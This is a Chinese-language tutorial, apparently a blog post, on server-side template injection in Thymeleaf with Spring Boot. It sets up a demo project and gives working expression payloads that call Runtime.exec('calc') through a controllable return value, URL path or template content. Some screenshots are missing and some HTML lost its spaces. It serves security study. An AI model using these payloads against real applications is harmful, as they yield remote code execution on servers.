0x00 Introduction

0x01 Usage

点击“创建”并删除其他无用文件后的项目结构如下所示。其中 java 目录是用于存放代码的，目录 resources 是用于存放静态资源（包括：html、css、js、img、模板等）。

默认情况下，使用 Thymeleaf 模板引擎的 SpringBoot 项目会自动扫描 resources/templates 目录下的模板文件（可通过 application.properties 配置文件进行更改）。所以，为了能被识别，首先需要创建 templates 目录。

在开发中 controller（控制器）层是用于接收请求，并交给对应 Service 层处理。将 Service 层的处理结果进行响应。且根据开发的规范，控制器一般都放在 controller 目录下。

启动项目后，访问 8080（默认）端口，即会返回 test.html 页面。

Thymeleaf 中标准表达式语法有如下几个：

通过 Model（模型） 来定义一个变量 msg，模板通过 [[${msg}]] 来取得变量的值。

0x02 Vulnerability

下载对应项目，通过 idea 打开并删除其他没用文件，目录结构如下所示：

该项目端口在 8090 上，如下则表示成功启动：

1. Return 可控

如果 return 语句的内容可控，那么就可以构造恶意的模板注入语句实现 RCE。

在测试时，如未成功，则可以将 Payload 进行 URL 编码后再次进行利用。注：@RequestParam注解表示获取指定请求参数的值。

将请求方法改为 POST 类型进行测试，同样可以实现 RCE。

2. URL 可控

__${T(java.lang.Runtime).getRuntime().exec("calc")}__::.x

不仅是 GET 请求，其他请求 POST、HEAD、PUT、OPTION、DELETE 等经测试都可以触发 RCE。

3. 模板内容可控

<!DOCTYPE HTML><htmllang="en"xmlns:th="http://www.thymeleaf.org"><divth:fragment="header"><h3>Spring Boot Web Thymeleaf Example</h3></div><divth:fragment="main"><spanth:text="__${msg}__"></span></div></html>

${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("calc").getInputStream()).next()}

0x03 Reference